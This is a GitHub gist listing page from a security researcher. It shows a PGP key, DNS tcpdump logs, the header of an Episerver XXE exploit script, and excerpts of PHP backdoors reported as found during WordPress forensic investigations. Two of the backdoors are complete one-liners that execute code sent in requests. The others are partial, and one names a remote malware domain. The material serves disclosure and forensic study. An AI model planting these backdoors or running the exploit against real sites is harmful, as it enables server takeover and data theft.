Skip to content

Instantly share code, notes, and snippets.

🏠
Working from home

Jonas Lejon jonaslejon

🏠
Working from home
Block or report user

Report or block jonaslejon

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@jonaslejon
jonaslejon / gist:229e96e45bcb527cdf63b8ee930687af
Created Oct 31, 2019
ECC (ed25519) PGP key for info@wpsec.com
View gist:229e96e45bcb527cdf63b8ee930687af
-----BEGIN PGP PUBLIC KEY BLOCK-----
xjMEXM1iexYJKwYBBAHaRw8BAQdAd5puI0BsbMGlbPINpNrUeC9eNCsPQki+
aE85QKgWSDrNISJpbmZvQHdwc2VjLmNvbSIgPGluZm9Ad3BzZWMuY29tPsJ3
BBAWCgAfBQJczWJ7BgsJBwgDAgQVCAoCAxYCAQIZAQIbAwIeAQAKCRDkdovE
xonnc5riAQDS3oEqOWnVxvEHMk0p0BTxjtkPjX3uzY7O4zjSdYbGZwD/UNdA
ttTc3r3h16VXckVnU97+hfDD1D2u1SgroQuOZAzOOARczWJ7EgorBgEEAZdV
AQUBAQdAIURGKKfePumaTh5pyuXdR/M2YAk9CeCBAa9XNiGs+TMDAQgHwmEE
GBYIAAkFAlzNYnsCGwwACgkQ5HaLxMaJ53N6OAEAqbRGJbm519QuOgFTA5X8
KkwkWo0Shj7RKEP20TjMa00A/AsA9seenGb5CFMMNaw4kifBYwC9WnzEVqHy
LirJSDMF
@jonaslejon
jonaslejon / dns-resolvers.txt
Last active Jun 25, 2018
DNS Resolvers with tcpdump output
View dns-resolvers.txt
## Resolver 1 Bahnhof
21:25:35.771950 IP 212.85.75.170.19496 > 79.99.X.X.53: 49195% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.153508 IP 212.85.75.170.55716 > 79.99.X.X.53: 26680% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.527427 IP 212.85.75.170.54433 > 79.99.X.X.53: 59891% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:37.279054 IP 212.85.75.170.21402 > 79.99.X.X.53: 44218% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.039318 IP 212.85.75.170.40338 > 79.99.X.X.53: 12866% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.771474 IP 212.85.75.170.25648 > 79.99.X.X.53: 42286% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:39.540317 IP 212.85.75.170.10337 > 79.99.X.X.53: 17760% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:40.276141 IP 212.85.75.170.57853 > 79.99.X.X.53: 29710% [1au] A? sfsdsdf.msg.triop.se. (49)
@jonaslejon
jonaslejon / episploit.py
Last active Aug 28, 2018
Episerver XXE Vulnerability - Exploit Episploit
View episploit.py
#!/usr/bin/python
##
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
##
## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
##
## Written by Jonas Lejon 2017-12-19 <jonas.xxe@triop.se> https://triop.se
## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
##
## Usage: ./episploit.py <target> [file-to-read]
@jonaslejon
jonaslejon / wp-uninstall.php
Created Apr 8, 2018
WordPress backdoor found in file wp-uninstall.php
View wp-uninstall.php
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject \n$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
@jonaslejon
jonaslejon / _input__test.php.
Created Oct 10, 2017
WordPress backdoor found during forensic investigation of blog. Was located in folder wp-content/uploads/
View _input__test.php.
<?php
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PluginJoomla {
public function __construct() {
$jq = @$_COOKIE['ContentJQ3'];
@jonaslejon
jonaslejon / wp-blog-header.php
Last active Jul 7, 2018
Malware found on WordPress installation. This is the deobfuscated version
View wp-blog-header.php
<?php @error_reporting(0);
define('cdomainDosNZ', "ssl-backup24.com");
define('showop_phpDosNZ', "showop_click.php");
define('info_phpDosNZ', 'info.php');
if (array_key_exists('HTTP_TEST', $_SERVER)) {
echo (md5("TEST2016_CLICK"));
exit;
}
function fetch_urlDosNZ($url, $data) {
$content = '';
@jonaslejon
jonaslejon / file-upload.php
Created Feb 10, 2016
PHP file upload backdoor
View file-upload.php
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
@jonaslejon
jonaslejon / php-preg-replace-backdoor.php
Created Feb 10, 2016
Short PHP backdoor using preg_replace. Found during forensic investigation
View php-preg-replace-backdoor.php
<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], '');
@jonaslejon
jonaslejon / PHP-cookie-backdoor.php
Last active Dec 13, 2017
This is a PHP COOKIE backdoor that was found during a forensic investigation
View PHP-cookie-backdoor.php
@jonaslejon
jonaslejon / web-backdoor.php
Created Jan 11, 2016
Web PHP Malware found during forensic investigation
View web-backdoor.php
<?php
eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")%
You can’t perform that action at this time.